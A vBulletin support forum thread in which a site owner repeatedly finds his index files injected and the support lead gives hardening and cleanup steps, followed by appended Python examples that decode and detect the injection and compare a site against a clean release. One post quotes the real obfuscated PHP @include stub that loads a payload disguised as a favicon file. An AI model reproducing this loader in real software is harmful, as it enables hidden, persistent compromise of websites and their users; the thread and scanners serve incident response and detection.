Error log

  • Wayne Luke
    vBulletin Technical Support Lead
    • Aug 2000
    • 73981

    #16
    Originally posted by mittac
    All done, it did not help - they still hack the site. How do I determine how they get on the server?
    Unless you have comprehensive access logs and detection security, it is almost always a waste of time to try and determine how someone is gaining access to a web server. If they have a vague clue about what they are doing, they will cover their tracks.
    1. Lock down your site. Only use SFTP, SMTP, and SSH to connect to the server remotely. FTP, POP3, IMAP, and Telnet should be disabled. cPanel should only be accessed via HTTPS.
    2. Make sure the server is up to date with all software - OS, Web Server, PHP, MySQL/MariaDB, etc...
    3. Change passwords and make sure they are long and secure.
    4. Use the tools in vBulletin 5 to lock down your AdminCP and ModCP. You can restrict access via IP address in /core/includes/config.php. You can also enable Two-Factor Authentication.
    5. Update all your passwords and make sure that each service uses a unique password (SFTP, MySQL, SMTP, SSH, cPanel, etc...)
    6. Make sure vBulletin is up to date.
    7. Make sure all included .htaccess files are in place. We use these to prevent access to sensitive areas.
    8. Talk to your host to see if you can CHMOD the files to 0644. That will prevent other users on the server from accessing them.
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API

    Comment

    • mittac
      Member
      • Feb 2014
      • 93
      • 5.0.X

      #17
      Originally posted by Wayne Luke

      Unless you have comprehensive access logs and detection security, it is almost always a waste of time to try and determine how someone is gaining access to a web server. If they have a vague clue about what they are doing, they will cover their tracks.
      1. Lock down your site. Only use SFTP, SMTP, and SSH to connect to the server remotely. FTP, POP3, IMAP, and Telnet should be disabled. cPanel should only be accessed via HTTPS.
      2. Make sure the server is up to date with all software - OS, Web Server, PHP, MySQL/MariaDB, etc...
      3. Change passwords and make sure they are long and secure.
      4. Use the tools in vBulletin 5 to lock down your AdminCP and ModCP. You can restrict access via IP address in /core/includes/config.php. You can also enable Two-Factor Authentication.
      5. Update all your passwords and make sure that each service uses a unique password (SFTP, MySQL, SMTP, SSH, cPanel, etc...)
      6. Make sure vBulletin is up to date.
      7. Make sure all included .htaccess files are in place. We use these to prevent access to sensitive areas.
      8. Talk to your host to see if you can CHMOD the files to 0644. That will prevent other users on the server from accessing them.
      I did all this: changed all passwords, changed permissions. All the same, it writes code like this into the index files. How can I determine how this works?

      <?php
      /*fa1da*/

      @include "\x2fh\x6fm\x65/\x61t\x76c\x6cu\x62b\x2fp\x75b\x6ci\x63_\x68t\x6dl\x2fc\x6fr\x65/\x63p\x73t\x79l\x65s\x2fv\x42u\x6cl\x65t\x69n\x5f5\x5fD\x65f\x61u\x6ct\x2ff\x61v\x69c\x6fn \x5f7\x39c\x611\x39.\x69c\x6f";

      /*fa1da*/
      /*========================================================================*\
      || ###################################################################### ||
      || # vBulletin 5.3.3 - Licence Number LC411C201D
      || # ------------------------------------------------------------------ # ||
      || # Copyright 2000-2017 vBulletin Solutions Inc. All Rights Reserved. # ||
      || # This file may not be redistributed in whole or significant part. # ||
      || # ----------------- VBULLETIN IS NOT FREE SOFTWARE ----------------- # ||
      || # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
      || ###################################################################### ||
      \*========================================================================*/

      // ######################## SET PHP ENVIRONMENT ###########################

      Comment

      • Wayne Luke
        vBulletin Technical Support Lead
        • Aug 2000
        • 73981

        #18
        This is the file they are including - /home/atvclubb/public_html/core/cpstyles/vBulletin_5_Default/favicon%20_79ca19.ico

        That is not a vBulletin file. You need to make sure that every file on your server is one that you put there.

        I suggest...
        1. Backing up the /config.php and /core/includes/config.php
        2. Back up any custom style images you have.
        3. Moving attachments to the database in the AdminCP. (Attachments -> Attachment Storage Type)
        4. Moving avatars into the database (Avatars -> User Picture Storage Type)
        5. Moving CSS into the database (Settings -> Options -> Style and Language Options)
        6. Deleting every single file in your vBulletin directory.
        7. Changing your vBulletin passwords (they should be considered compromised)
        8. Replace them with a new copy of files downloaded from this site.
        9. Move the above items back to the file system.

        Comment
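Added example (not part of the original posts and not vBulletin code): a Python sketch that decodes the escaped string from post #17, as #18 does by hand, and scans a tree for the same marker/@include stub. The function names and the two-file sample tree are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Marker comment, @include of a double-quoted string, then the same marker again.
STUB_RE = re.compile(
    rb'/\*(\w{4,8})\*/\s*@include\s+"((?:[^"\\]|\\.)+)"\s*;\s*/\*\1\*/')
ESC_RE = re.compile(rb'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')

def decode_php_string(raw: bytes) -> str:
    """Resolve the \\xHH and octal escapes PHP expands in double-quoted strings."""
    def expand(m):
        code = int(m.group(1), 16) if m.group(1) else int(m.group(2), 8) & 0xFF
        return bytes([code])
    return ESC_RE.sub(expand, raw).decode("utf-8", "replace")

def scan_tree(root):
    """Return one dict per injected stub found in *.php files under root."""
    hits = []
    for path in sorted(Path(root).rglob("*.php")):
        for m in STUB_RE.finditer(path.read_bytes()):
            target = decode_php_string(m.group(2))
            hits.append({
                "file": path.relative_to(root).as_posix(),
                "marker": m.group(1).decode(),
                "target": target,
                # Including something that is not a .php file is a strong signal.
                "non_php_target": not target.lower().endswith(".php"),
            })
    return hits

# The obfuscated string exactly as posted in #17 (split only for line length).
POSTED = (rb'\x2fh\x6fm\x65/\x61t\x76c\x6cu\x62b\x2fp\x75b\x6ci\x63_\x68t\x6dl'
          rb'\x2fc\x6fr\x65/\x63p\x73t\x79l\x65s\x2fv\x42u\x6cl\x65t\x69n\x5f5'
          rb'\x5fD\x65f\x61u\x6ct\x2ff\x61v\x69c\x6fn \x5f7\x39c\x611\x39.\x69c\x6f')

def demo():
    """Build a constructed two-file tree (one clean, one injected) and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "core").mkdir()
        (root / "core" / "clean.php").write_bytes(b'<?php\necho "ok";\n')
        (root / "index.php").write_bytes(
            b'<?php\n/*fa1da*/\n\n@include "' + POSTED + b'";\n\n/*fa1da*/\n// ...\n')
        return scan_tree(root)

if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

Every file a hit names needs cleaning, and the decoded target is the dropped payload to remove and preserve for analysis.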

        • mittac
          Member
          • Feb 2014
          • 93
          • 5.0.X

          #19
          I write new files, and a day later this entry appears in them. I changed the access rights on these files to 0644 - it does not help. How can I determine which script is making this entry?

          Comment

          • mittac
            Member
            • Feb 2014
            • 93
            • 5.0.X

            #20
            I delete these files, and a day later they appear elsewhere

            Comment

            • Wayne Luke
              vBulletin Technical Support Lead
              • Aug 2000
              • 73981

              #21
              Originally posted by mittac
              I delete these files, and a day later they appear elsewhere
              Then someone has access to your server. I would find a new server company.

              Comment
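Added example (not from the thread or from vBulletin): one way to check that every file on the server is one you put there, by hashing the live tree against a fresh copy of the same release and listing what was added, modified or removed. The sample file names are constructed, apart from the favicon path quoted in #18; `expected_local` is a hypothetical parameter for site-specific files such as config.php.

```python
import hashlib
import tempfile
from pathlib import Path

def manifest(root):
    """Map each file's path relative to root to its SHA-256 digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}

def compare(clean_root, live_root, expected_local=()):
    """Classify live files against a clean copy of the same release."""
    clean, live = manifest(clean_root), manifest(live_root)
    local = set(expected_local)
    return {
        "added": sorted(f for f in live if f not in clean and f not in local),
        "modified": sorted(f for f in live if f in clean and live[f] != clean[f]),
        "missing": sorted(f for f in clean if f not in live),
    }

def demo():
    """Constructed trees: a 'clean' release copy and a tampered 'live' copy."""
    style_dir = "core/cpstyles/vBulletin_5_Default"
    files = {"index.php": b"<?php // release file\n",
             "core/includes/.htaccess": b"Deny from all\n",
             style_dir + "/favicon.ico": b"\x00\x00\x01\x00"}
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp, "clean"), Path(tmp, "live")
        for base in (clean, live):
            for rel, data in files.items():
                (base / rel).parent.mkdir(parents=True, exist_ok=True)
                (base / rel).write_bytes(data)
        (live / "config.php").write_bytes(b"<?php // site config\n")
        (live / "index.php").write_bytes(b"<?php /*fa1da*/ // injected\n")
        (live / style_dir / "favicon _79ca19.ico").write_bytes(b"<?php\n")
        (live / "core/includes/.htaccess").unlink()
        return compare(clean, live, expected_local={"config.php"})

if __name__ == "__main__":
    for kind, names in demo().items():
        print(kind, names)
```

Running the comparison again after each reinfection shows which paths change between runs, and those timestamps narrow down which access-log entries to review.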
